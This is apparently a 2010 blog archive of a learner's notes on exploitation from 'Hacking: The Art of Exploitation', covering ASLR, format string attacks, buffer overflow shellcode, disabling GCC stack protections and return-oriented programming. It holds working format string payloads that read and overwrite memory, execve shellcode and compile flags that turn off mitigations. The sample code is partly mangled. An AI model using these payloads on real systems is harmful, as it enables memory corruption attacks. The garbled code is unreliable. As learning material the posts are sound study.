Archive for September, 2010

ASLR, Dynamic Linkers, & Mmap

Well I had hoped to learn more about Address Space Layout Randomization (ASLR) and blog about it after reading “On the Effectiveness of Address-Space Layout Randomization.” I got about a quarter of the way through the paper and realized that I need to better understand address space layout in general. Where is libc in memory and how do programs get access to it?

I’ve been Googling and reading for the last 3.5 hours and am somewhat more informed but I’m still trying to figure it all out.

Every ELF executable on Linux invokes the dynamic linker which is the bootstrap for finding and loading all other shared libraries (.so extensions). I think that the linker uses mmap() to memory map the shared libraries from the disk into virtual address space but I’m still somewhat confused on this part.

Mmap was another thing I wasn’t familiar with. Memory mapped files essentially allow a program to refer to a file as if it were in memory by paging in page sized chunks into memory. For writing files, it has the advantage that many small writes will happen to memory and then the virtual memory manager will write the page all at once to disk. I’m still trying to figure out what the advantage of mmap’ing shared libraries is. For shared libraries, mmap is used to map the shared library into the processes address space as if the process contained library in it’s memory. According to what I read, mmap can be used to map “shared memory objects” as well as files, etc. Basically anything that has a file descriptor can be memory mapped.

I’m wondering if the operating system loads very common and essential libraries like glibc into physical memory and then mmap’s them to the processes virtual address space or if it memory maps the actual file on disk like I mentioned above (i.e. /usr/lib/

So far the best material I’ve found related to these subjects was

and one that looks good but I haven’t had a chance to read yet this one is especially good:

Format String Vulnerabilities:Part 2

In part one of Format String Vulnerabilities I showed you some simple code with a very serious format string vulnerability. I showed you how you could exploit this vulnerability to read any part of memory. In section two, I’m going to show you how you can write to any address in memory!

Writing to Memory

Exploiting format string vulnerabilities is all about providing input that uses a format character that expects its value to be passed by reference and you control that reference. I used ‘%s’ to read from memory. I’m going to use %n to write to memory.

%n	      Number of characters written by this printf.

Lucky for us, there is a really easy way to control the number of characters written by printf. When you specify a format character, you can optionally give it an integer for the width of the format character.

%#x	      Number of characters prepended as padding.

We can use this to control how many characters are written by printf.

If you’re following at this point, you’re probably wondering how we’re going to use %n to write to memory. We can use %n to write the integer value of our 4 byte target address one byte at a time.

We can write the lower order bits and shift the target address by a byte, utilizing width padding characters to control the integer value we write to a given byte.

Target = 0xAAAA1111
0xAAAA1111 = <int>
0xAAAA1112 = <int>
0xAAAA1113 = <int>
0xAAAA1114 = <int>

If we can overwrite an address, we can control the flow of execution. Let’s overwrite the address of printf! First we need to find the address for printf

nobody@nobody:~$ objdump -R ./text_to_print
08049660 R_386_JUMP_SLOT   printf

Next we need to craft a string to overwrite this address using %n and width padding. We’ll also use printf’s ability to argument swap:

One can also specify explicitly which argument is taken
by writing '%m$' instead of '%'

Lastly, instead of writing a byte at a time, we can use printf’s ‘length modifier’ to tell printf what type it’s writing %n too. We’ll use ‘l’ (ell) for long unsigned int.

0x0000beef seems like a good address to overwrite printf with since everyone loves beef! Our input will be a 4 byte address (to printf) and the decimal value of beef – 4 (to accommodate the length of the address) = 48875.

Here’s what It looks like when we run it (note we have to escape the $ with a for the shell):

nobody@nobody:~$ ./text_to_print $(python -c 'print "x60x96x04x08"')%48875x%4$ln

Program received signal SIGSEGV, Segmentation fault.
0x0000beef in ?? ()

You can see that the program tried to jump to 0x0000beef and crashed! Be sure to check out the full section on format string vulnerabilities inHacking: The Art of Exploitation, it talks all about these techniques and more.

Disable VirtualBox Menu Bar OSX

I frequently use Linux in VirtualBox as a testing and hacking environment. It got really annoying when I would go to the Gnome menu bar and the OSX Menu bar would pop up overtop of the Gnome menu bar!

Luckily, the guys (or gals) over at Eternal Storms Software have an awesome app called PresentYourApps. Once you’ve installed it, set VirtualBox VM to “Remove Menu Bar and Dock”

Then, restart VirtualBox — no more Menu Bar!

Format String Vulnerabilities:Part 1

I have to admit that I’ve heard of format string vulnerabilities but I never knew exactly what they were. After reading about them in Hacking: The Art of Exploitation I’m surprised I didn’t know more about them since they are extremely dangerous! Take this code for instance:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];

   if(argc < 2) {
      printf("Usage: <text to print>n", argv[0]);
   strncpy(text, argv[1], 1024);


   return EXIT_SUCCESS;

Normal usage would look like this:

nobody@nobody:~$ ./text_to_print "Hello World!"
Hello World!

Looks harmless right? It’s not! This code is very vulnerable to a format string vulnerability. The problem is, the call to printf, should have been:

 printf("%s", text);

Why does it matter? Well the way that printf works is that all of the variable arguments for the format strings are passed in reverse order onto the stack. Printf then parses the input until it reaches a format character and references the argument on the stack based on the index of the format character.

If we specially craft the input to take format characters, printf will mistakenly reference previous elements on stack. We can use this to effectively read the stack. For instance

nobody@nobody:~$ ./text_to_print "AAAA %x %x %x %x"
AAAA bffff9ba 3f0 0 41414141

It gets better though! The previous stack frame before printf is called contains the string argument passed to printf. Did you notice in the output above, the last ‘%x’ printed the first ‘AAAA’?

We can use this to read the contents of any memory address by putting the address we want to read at the first of the string, followed by 3 stack positions (8 bytes each), and then putting a ‘%s’ format character at the 4th position to read our address. Like this (the ‘+’ is used to separate for readability)

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")%08x%08x%08x%s

or with Python like this

nobody@nobody:~$ ./text_to_print $(printf "x34xf8xffxbf")$(python -c 'print "%08x+"*3')%s

00000000 is the contents of address xbffff834!

More to come on using format string vulnerabilities to write to any place in memory in Part Two of Format String Vulnerabilities!

Flow of a Buffer Overflow Payload

Here is the flow of a buffer overflow payload with a NOP Sled.

  1. Jump to overwritten return address that (hopefully) points to somewhere in the NOPs (0×90)
  2. Consume the No Operations (NOPs)
  3. Execute the shell code


Trouble Spawning a Shell

I’ve been working on some of the examples out of the Hacking: The Art of Exploitation book which exploit a program with shellcode but I’m not having much luck. The exploit makes sense conceptually but I can’t get it to spawn the shellcode.

It uses the system() function to invoke the exploitable program from the shell with the payload as a commandline arg. I want to look at the stack in GDB of the command being invoked by the system() function … does anyone know how to do this or know if it’s even possible?

It’s possible for me to look at the stack when I pass the arguments myself from the commandline but the system() function is doing it instead cause it’s easier to construct the shellcode programmatically.

I also looked at the return value of the system() function and it’s zero meaning that the program exited normally. I’m curious if the somehow the command payload isn’t getting passed correctly so I was hoping to look at the stack…

My problems were related to trying to execute the exploit on a 64-bit system when the code was developed for 32-bit. After switching over to a 32-bit OS, I was able to spawn a shell no problem!

32 bit vs 64 bit exploitation

The exploit code in Hacking: The Art of Exploitation is targeted towards overwriting 32 bit return addresses (size 4). It uses code like this:

unsigned int ret;
ret = &var;
*((unsigned int *)(buffer+sizeof(unsigned int))) = ret;

I’m working on a 64 bit machine and thus my addresses are double in size. I’m guessing this means that the above code won’t work on my machine (I’m not sure?). I searched around and found an “unsigned integer pointer type” which is defined per architecture and it is indeed size 8 on my 64 bit machine. I changed the code to this:

uintptr_t ret;
ret = &var;
*((uintptr_t *)(buffer+sizeof(uintptr_t)) = ret;

I thought that this was the reason I was having trouble spawning a shell from shellcode but after changing the code it still doesn’t spawn a shell.

Not only do I think the return addresses are going to be different between 64 bit and 32 bit but they’ve totally changed the syscall numbers in “unistd.h”. That means that this shellcode isn’t going to work at all on 64-bit because it assumes ‘execve’ is 11.

; execve(const char *filename, char *const argv [], char *const envp[])
  push BYTE 11      ; push 11 to the stack
  pop eax           ; pop dword of 11 into eax
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

On 64 bit, 11 is ‘munmap’

#define __NR_munmap                             11

Looks like I’ll definitely be installing a 32 bit version of Linux in order to follow along with the examples, 64 bit is going to be too challenging while I’m in the learning stage.

Quickly Use BC to Convert Hex to Dec

This post is mainly for my own benefit because I’ll forget this if I don’t put it down somewhere. A lot of the times I need to convert hex to dec when I’m on the command line and it’s a pain to open up the calculator so here is the command line equivalent

echo "ibase=16; FFFF" | bc

Turning off buffer overflow protections in GCC

As I’m learning more and more about exploiting buffer overflows I’m realizing that it’s actually pretty hard to run the examples that teach you how to exploit buffer overflows. GCC (and other compilers) have built in support for mitigating the simple buffer overflows and it’s turned on by default.

With GCC you have to compile with the -fno-stack-protector option otherwise you get “***stack smashing detected***,” this is pretty well known and documented all over the net.

However, additionally you’ll need to disable the FORTIFY_SOURCE option otherwise you’ll get “Abort trap” if you try to do a buffer overflow that uses something like strcpy or memcpy.

To disable it, simply compile with the flag -D_FORTIFY_SOURCE=0 (e.g. gcc -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -o overflow_example overflow_example.c)

FORTIFY_SOURCE is enabled by default on a lot of Unix like OSes today. It’s original development dates back almost 6 years ago but I don’t think it was turned on by default until recently (within the past 2 years)

#  else
#    define _FORTIFY_SOURCE 2	/* on by default */
#  endif

That means that when you include something like “string.h”, at the bottom of “string.h” is the following (at least on Mac OS X 10.6):

#if defined (__GNUC__) && _FORTIFY_SOURCE > 0 && !defined (__cplusplus)
/* Security checking functions.  */
#include <secure/_string.h>

So when you compile, instead of seeing a call to strcpy

0x0000000100000d50 <main+188>:  lea    rdi,[rbp-0x20]
0x0000000100000d54 <main+192>:  call   0x100000dba <dyld_stub_strcpy>
0x0000000100000d59 <main+197>:  lea    rdx,[rbp-0x20]

you’ll see a call to the strcpy_chk function in your disassembled code

0x0000000100000d50 <main+192>:  mov    edx,0x8
0x0000000100000d55 <main+197>:  call   0x100000daa <dyld_stub___strcpy_chk>
0x0000000100000d5a <main+202>:  lea    rdx,[rbp-0x20]

This will wreck havoc on any of your simple buffer overflow exploiting examples so make sure you disable it when you compile. Happy exploiting!

Adobe PDF Return Oriented Exploit

The news just keeps getting worse for Adobe. After releasing an out-of-band patch for their other 0-day PDF exploit used to jailbreak the iPhone, the people at McAfee discovered malware in the wild exploiting another 0-day PDF exploit. Apparently this exploit takes advantage of your typical buffer overflow exploit (come on Adobe!) but the way it’s exploited is very interesting; it uses return oriented programming.

Return Oriented Exploitation

This is a very clever exploitation technique that subverts all known countermeasures to mitigate exploitation of overflows such as ASLR, compiler stack protection, and non-executable memory regions. It essentially works by using the prior code on the stack as well as well known (not everything is randomized) locations of library routines as building blocks for executing code. The key is that every “building block” must end in a RET instruction, hence the name return oriented.

Suppose after scanning memory we found the following useful “building blocks” (Commented for understanding )

Block 1
   mov	ebx,0x01 # fd = sysout
Block 2
	mov	ecx,msg # Some msg (e.g. Hello World)
	mov	edx,len # len of msg
Block 3
	mov	eax,0x04 #write syscall
	int	0x80

You could construct each of these “building blocks” in reverse order such that the RET address jumped from one block to the next, in essence executing the following code:

	mov	ebx,0x01 # fd = sysout
	mov	ecx,msg # Some msg (e.g. Hello World)
	mov	edx,len # len of msg
	mov	eax,0x04 #write syscall
	int	0x80

You’re exploit would print “Hello World” to standard out at this point (not much of an exploit!).

These types of exploitation techniques seem very hard to defend against. I’d be interested to see what mitigation techniques they’ll come up for to defend this! For more info on Return Oriented Exploitation, check out an excellent presentation at

Go to Top